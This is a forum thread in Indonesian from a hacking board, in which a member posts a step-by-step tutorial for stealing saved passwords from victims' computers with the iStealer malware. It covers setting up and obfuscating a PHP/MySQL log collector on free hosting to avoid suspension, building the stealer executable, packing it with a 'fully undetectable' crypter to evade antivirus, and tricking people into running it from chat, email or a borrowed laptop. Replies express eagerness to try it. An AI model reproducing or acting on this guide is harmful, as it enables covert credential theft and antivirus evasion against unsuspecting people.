Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-19-2013, 03:43 PM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Network Hacking v
« Previous 1 2 3 4 5 ... 10 Next »

[Tutor] 'Curi' Password dengan iStealer

Home General Computer Multimedia Business Lounge

Pages (3): 1 2 3 Next »
Post Reply 
Tweet
Threaded Mode | Linear Mode
Tutor 'Curi' Password dengan iStealer
08-12-2011, 10:45 PM (This post was last modified: 08-12-2011 11:16 PM by unyil.)
Post: #1
unyil Offline
./Devilz Officer
Posts: 144
Joined: Feb 2010
Reputation: 8
'Curi' Password dengan iStealer
Ok...here's my another tutorial for you. asikasikasik
Apa itu istealer?

Sesuai official webnya : iStealer adalah adalah program pencuri password yang hanya melakukan mencuri password yang tersave di komputer. Program ini hanya berjalan satu kali saja pas eksekusi. jadi berbeda dengan keylogger yang men-save log komputer (pass or apapun yang diketik dikomputer. istealer akan mengirim password hasil 'curianya' ke mysql database yang telah kita set sebelumnya. Berikut list software yang kena jika ada pass yang di save.
[Image: sshot-1.png]
so, once again, istealer tidak seperti keylogger yang terus running di komputer yang melakukan log setiap sekian menit or jam.
[Ask ]Jadi apa dong kelebihanya ?
[An ] Dengan program ini kamu bisa steal password victim, hanya dengan double click dengan programnya di komputer komputer korban dan password akan terkirim ke mysql database kita.

How to find the target ?
1. Social engineering
well, in tergantung kreatifitas anda. tapi, let me show u one. kamu bisa kirim ni program ke teman chat atau lewat email terserah yang penting program executed di komputer korban.
Bisa juga gunakan cara om danzel dengan di bind di winrar
http://devilzc0de.org/forum/thread-9190.html
2. Execute on Owned windows system
next one, saat kita melakukan penentrasi network, salah satunya pake metasploit. kita bisa upload ni program ke komputernya and yeah execute it to get the password ketawa

Ok..let's get started to real POC

1. Download Istealer 6.3
2. Setting PHP Logger
* membuat undetectable php logger
3. Create this evil program
4. Crypt The program
5. Beraksi



[==Download Istealer==]
Latest version istealer 6.3 bisa di download di official http://istealer.webobo.biz atau bisa langsung Disini

[==Setting PHP Logger==]

Untuk menyimpan log istealer, kita membutuhkan hosting server yg support php dan mysql.
Untuk server buat logger memang tidak boleh sembarangan, karena apa, hosting biasanya me-suspend account karena mereka bilang breaking the Terms Of Service alias melanggar aturan hostnya. walah...
Lebih enak kalu punya shell di server victim, tinggal upload disana dah.
tapi tenang aja ada tipsnya untuk meng-handle di host yang gratisan. daftar di host gratis
http://byethost.com/
Langsung saja sign-up, dan lakukan activasi dari email (biasanya spam bukan inbox). Setelah melakukan activasi anda akan dapat email lagi berisi informasi account hosting.
langsung saja Click alamat cpanel di email balasan tadi untuk Login ke cpanel anda and of course login with your username and password , jangan yang lain. ketawa
Masuk ke MySQL Databases dan buat database baru.

buka folder istealer disana ada file phplogger, extrack dan buka file index.php dan isi sesuai configurasi host.

PHP Code:
$dbHost   = "localhost";          // MySQL host
$dbUser   = "";     // username mysql (lihat di kiri halamn cpanel anda)
$dbPass   = "";     // dbpass(password saat daftare di byethost)
$dbDatabase = "";     // isi dengan nama database
$username  = "admin";          // Login buat nanti masuk logger
$password  = "admin";          // Login Password 
* Buat php logger undetectable
Setelah semua disi sekarng kita harus edit lagi index.php supaya tidak terkena banned di hosting nanti, sekarang di notepad cari ctrl+F text berikut

Code:
$html       = "<html><head><title>iStealer 6.1 Legends Log manager - ";
Ganti dengan
$html       = "<html><head><title>Admin Manager - ";

$footer     = "<div id='footer'>iStealer 6.1 Legends - Kizar Labs 2009</div></div></body></html>";
Ganti dengan
$footer     = "<div id='footer'>Admin Manager</div></div></body></html>";

Selanjutnya ada membutuhan software Encoder gunakan saja ini
TrueBug PHP Obfuscator & Encoder Download
* Buka programnya, di source folder pilih folder tempat index.php berada dan si Target folder tentukan letak folder nanti setelah di encode.
* Pilih tab Obfuscator & encoder langsung checklist semua pilihan dan klik process.

Jadi sekarang index.php yang di upload adalah yang sudah di encoding, ingat bukan yang ori (nanti di suspend accountnya kalau yang ori) hmm

Upload index.php dan style.css ke hosting menggunakan file manager di cpanel atau lewat ftp (gunakan filezilla up to you..hmm).
Lalu Ubah permission htdocs menjadi 777
[Image: sshot-3.png]
Ok php Logger sudah selesai,, lanjut.

Alternative free host yang lain
Code:
http://000webhost.com/
http://freehostia.com/
http://x10hosting.com/
http://www.shockv2.com/
http://www.quotaless.com/
http://www.vgchat.info/


[==Creating evil program==]
Sebelumnya karena ini evil program jadi mungkin akan terdetek virus. jadi matikan anti virus anda terlebih dahulu. Or kalau anda masih takut gunakan Sanbox/Vmware untuk membukanya.
Buka iStealer 6.3 Legends.exe
[Image: sshot-2.png]
* Di kolom url masukan url dari hosting tadi misal

http://unyiltea.byethost22.com/index.php

* Jika success (logger found) berarti anda berhasil setting logger php di server.
(pilihan lain jika ingin bind dengan file lain pilih di kolom bind, dan icon untuk mengganti tampilan icon backdoor)

* klik build untuk membuat 'backdoor' dan simpan.

[==Crypt The program==]
Cypting adalah sebuah cara agar backdoor tidak terdetek virus (filenya). FUD Crypter adalah sebuah software untuk membuat backdoor menjadi undetectable oleh antivirus.
Untuk membuah backdoor menjadi FUD (fully undetectable). Kita bisa gunakan a runtime and scantime crypter yang banyak beredar di internet. just googling jika ingin nyari crypter. memang agak susah crypter yang undetectable, karena segera fud crypter di release ke public, antivirus pasti gencar me-list nya sebagai trojan. jadi crypter yang ajib memang harus contact crypter maker biasanya mereka punya yang private FUD crypter. Or jika anda expert in programming pastinya bukan masalah untuk buat yang kayak gini..hmm
Quote:runtime yakni backdooring tidak akan terdetek saat di eksekusi di target komputer sementara scantime, backdoor tidak terdetek saat di scan online

Disini saya gunakan salah satu crypter yakni personal crypter nemu di internet ketawa
[Image: sshot28.png]
Download Crypternya
password : darkparadise.rg3.net

Caranya tinggal select file backdooring yang telah dibuat. browse icon jika ingin ganti icon. langsung saja tekan crypter


[==BEraksi==]
seperti saya bilang sebelumnya caraya tergantung kreatifitas saja. Mungkin cara lain seperti ini. Save tuh backdoor di flashdisk. Pura2 minta data ke teman yang punya laptop, minta software or apa. Diam2 double click dah tuh backdooring. And yeah..saved password di komputernya langsung menuju database di server kita. Dan tetu saja kondisinya harus Konek internet lah...ckckck

[Image: sshot-3.png]
Ok...sekian dulu tutorial noob ini..Maaf jika tutorialnya priceless, karena ini teknik lama. ketawa
see yaa..later with more interesting poc...

Source
http://wildaninfo.blogspot.com/2011/08/c...er-63.html
Find all posts by this user
Quote this message in a reply
08-12-2011, 10:53 PM
Post: #2
autocrack Offline
./Devilz Officer
Posts: 226
Joined: Apr 2011
Reputation: 0
RE: 'Curi' Password dengan iStealer
wahhh,tapi biasanya d banned sma hostnnya dead
Find all posts by this user
Quote this message in a reply
08-12-2011, 10:56 PM
Post: #3
unyil Offline
./Devilz Officer
Posts: 144
Joined: Feb 2010
Reputation: 8
RE: 'Curi' Password dengan iStealer
(08-12-2011 10:53 PM)autocrack Wrote:  wahhh,tapi biasanya d banned sma hostnnya dead


kan ada triknya diatas. asik
Find all posts by this user
Quote this message in a reply
08-12-2011, 11:04 PM (This post was last modified: 08-12-2011 11:05 PM by autocrack.)
Post: #4
autocrack Offline
./Devilz Officer
Posts: 226
Joined: Apr 2011
Reputation: 0
RE: 'Curi' Password dengan iStealer
(08-12-2011 10:56 PM)unyil Wrote:  kan ada triknya diatas. asik

ini lagi pelajarin kakz,mohon bimbingan ya belajar
Find all posts by this user
Quote this message in a reply
08-12-2011, 11:19 PM
Post: #5
anko_kum4ru Offline
./b0k3p3r_4r34
****
Global Moderators
Posts: 1,451
Joined: Dec 2010
Reputation: 10
RE: 'Curi' Password dengan iStealer
izin mempelajari omz.. belajar belajar
mantep nih kyaxnya.. mantap mantap
Visit this user's website Find all posts by this user
Quote this message in a reply
08-12-2011, 11:26 PM
Post: #6
unyil Offline
./Devilz Officer
Posts: 144
Joined: Feb 2010
Reputation: 8
RE: 'Curi' Password dengan iStealer
(08-12-2011 11:04 PM)autocrack Wrote:  
(08-12-2011 10:56 PM)unyil Wrote:  kan ada triknya diatas. asik

ini lagi pelajarin kakz,mohon bimbingan ya belajar

sip....ketawa asik

(08-12-2011 11:19 PM)tabun Wrote:  izin mempelajari omz.. belajar belajar
mantep nih kyaxnya.. mantap mantap

iyo...om selamat belajar asik
Find all posts by this user
Quote this message in a reply
08-12-2011, 11:36 PM
Post: #7
d3d1aboy Offline
d3d14b0y
Posts: 167
Joined: Jan 2010
Reputation: 4
RE: 'Curi' Password dengan iStealer
ok si isep dolo :)
Find all posts by this user
Quote this message in a reply
08-12-2011, 11:42 PM
Post: #8
Hotau Offline
./Devilz Officer
Posts: 140
Joined: Jul 2011
Reputation: 0
RE: 'Curi' Password dengan iStealer
sip om, dipelajari buat latihan nyolong maling maling maling seneng seneng seneng
Find all posts by this user
Quote this message in a reply
08-13-2011, 01:57 AM
Post: #9
Wayc0de Offline
-= Sifu Makan Sonice =-
**
Moderators
Posts: 2,980
Joined: Nov 2010
Reputation: 61
RE: 'Curi' Password dengan iStealer
keren om,,, ijin comot dlu ea seneng
Visit this user's website Find all posts by this user
Quote this message in a reply
08-13-2011, 02:27 AM
Post: #10
dev4 Away
Nubie Only
Posts: 1,404
Joined: Apr 2011
Reputation: 11
RE: 'Curi' Password dengan iStealer
ijin nyoba omz, kayaknya menarik nih......
tx 4 sharing piss
Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Pages (3): 1 2 3 Next »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
Bug [Tutor] Cracking enskripsi wireless wpa – wpa2 dengan cowpatty DnA19 13 566 04-30-2013 10:12 AM
Last Post: x.intruders
Thumbs Up [Tutor] hacking password hotspot dj rabell 57 3,345 04-05-2013 12:13 AM
Last Post: ceetos
  [Tutor] DOS Win7 dengan metasploit jincorn 26 539 03-31-2013 10:34 AM
Last Post: x.intruders
  [SHARE] Wordlist Crack password WIFI Bet028 5 241 11-29-2012 10:33 PM
Last Post: sunafets.exe
Thumbs Up [Tutor] Flooding Dengan PHP DOS cliquersz 12 496 08-05-2012 02:06 AM
Last Post: monyett
  [Ask] Cara Crack Password Login Mikrotik Cucantooo 8 490 05-23-2012 06:29 PM
Last Post: ubuntux
Tongue udah pada nyobain nyolong password pake ini belom kak? kosim.tampan 51 2,108 04-07-2012 01:44 PM
Last Post: ubuntux
  obrak abrik ip telkomsel flash dengan longcat flooder t000mmyyy 34 1,104 03-30-2012 01:27 PM
Last Post: tresna
  Client Side Attack dengan metasploit wenkhairu 10 514 02-02-2012 03:15 PM
Last Post: dewancc
  0wned network dengan metasploit+armitage wenkhairu 18 673 01-23-2012 01:26 PM
Last Post: firex141

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-19-2013, 03:43 PM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE